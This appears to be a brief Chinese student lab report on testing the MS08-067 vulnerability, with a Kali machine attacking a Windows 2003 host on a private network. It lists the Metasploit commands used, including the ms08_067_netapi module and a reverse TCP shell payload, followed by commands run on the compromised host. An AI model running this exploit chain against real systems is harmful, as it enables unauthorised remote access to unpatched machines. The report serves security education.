20145333茹翔 Exp5 MS08_067漏洞测试
实验过程
-
IP:
kali:192.168.31.177
、windows 2003 :192.168.31.223
-
使用命令
msfconsole
进入控制台,可以使用search ms08_067查看相关信息。
-
得到相应模块名之后,我们使用该模块,使用
show payloads
,确定攻击载荷。
-
使用命令
use exploit/windows/smb/ms08_067_netapi
-
set payload generic/shell_reverse_tcp
选择playoad,并查看相关信息。
-
使用命令
show options
确定,之后按照显示出的信息进行修改,我们需要设置好监听ip,监听端口以及攻击Ip
-
我们可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)
-
使用命令
exploit
发起攻击,实验结果如下图
-
使用
ipconfig
命令查看
-
新建文件夹
20145333